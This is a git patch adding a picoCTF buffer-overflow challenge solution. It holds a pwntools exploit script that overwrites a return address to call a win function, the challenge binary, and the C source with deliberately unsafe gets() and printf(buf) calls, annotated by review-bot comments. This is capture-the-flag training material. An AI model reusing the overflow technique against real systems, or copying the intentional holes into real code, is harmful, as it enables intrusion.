From c56300256d0bcc30547e07d9a1eacf821697461d Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 19:46:13 +0200
Subject: [PATCH] pwn/buffer_overflow_2

---
 pwn/buffer_overflow_2/solve.py |  31 ++++++++++++++++++++++++
 pwn/buffer_overflow_2/vuln     | Bin 0 -> 15808 bytes
 pwn/buffer_overflow_2/vuln.c   |  43 +++++++++++++++++++++++++++++++++
 3 files changed, 74 insertions(+)
 create mode 100755 pwn/buffer_overflow_2/solve.py
 create mode 100755 pwn/buffer_overflow_2/vuln
 create mode 100644 pwn/buffer_overflow_2/vuln.c

diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py
new file mode 100755
index 0000000..b3dab5e
--- /dev/null
+++ b/pwn/buffer_overflow_2/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  print(r.recvuntil(b"Please enter your string:"))
+  offset = 112 # found with pwndbg
+  payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
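Review bot: `main` (lines 41–48) is indented with two spaces while `conn` (lines 33–38) uses four; Python only demands consistency within one block so the script runs, but one width should be chosen for the file. `r.close()` on the last line of `main` is skipped whenever `sendline()` or `recvall()` raises, for example when the service drops the connection early, so the interaction is better written as `with conn() as r:` (pwntools tubes are context managers) with the explicit `close()` removed. The `offset = 112 # found with pwndbg` comment would help a future reader more if it said what the number measures, e.g. `# distance from the start of buf to the saved return address, measured in pwndbg`, so it can be re-derived if the binary is ever rebuilt.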
diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..accb967c62baf9a39e56548a7ce13c01279497fa
GIT binary patch
literal 15808
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
T0kXQ2<_rw7FiB{bfz$y2vc+&Y

literal 0
HcmV?d00001

diff --git a/pwn/buffer_overflow_2/vuln.c b/pwn/buffer_overflow_2/vuln.c
new file mode 100644
index 0000000..60b8d31
--- /dev/null
+++ b/pwn/buffer_overflow_2/vuln.c
@@ -0,0 +1,43 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  if (arg1 != 0xCAFEF00D)
+    return;
+  if (arg2 != 0xF00DF00D)
+    return;
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+  puts(buf);
+}
+
+int main(int argc, char **argv){
+  setvbuf(stdout, NULL, _IONBF, 0);
+
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+
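Review bot: This file appears to be the challenge-provided source rather than code written for this repository (the solver in the same commit connects to saturn.picoctf.net), and nothing in it says so; a header comment such as `/* Challenge source kept verbatim; the unsafe calls below are the exercise, do not "fix" them. */` would stop a later cleanup or a static-analysis run from rewriting `gets(buf)` in `vuln` and `printf(buf)` in `win`, after which the source would no longer match the shipped `vuln` binary. Separately, `win` never calls `fclose(f)` and ignores the return value of `fgets`, which is worth noting in that same comment but not changing if the source must stay identical to what the binary was built from.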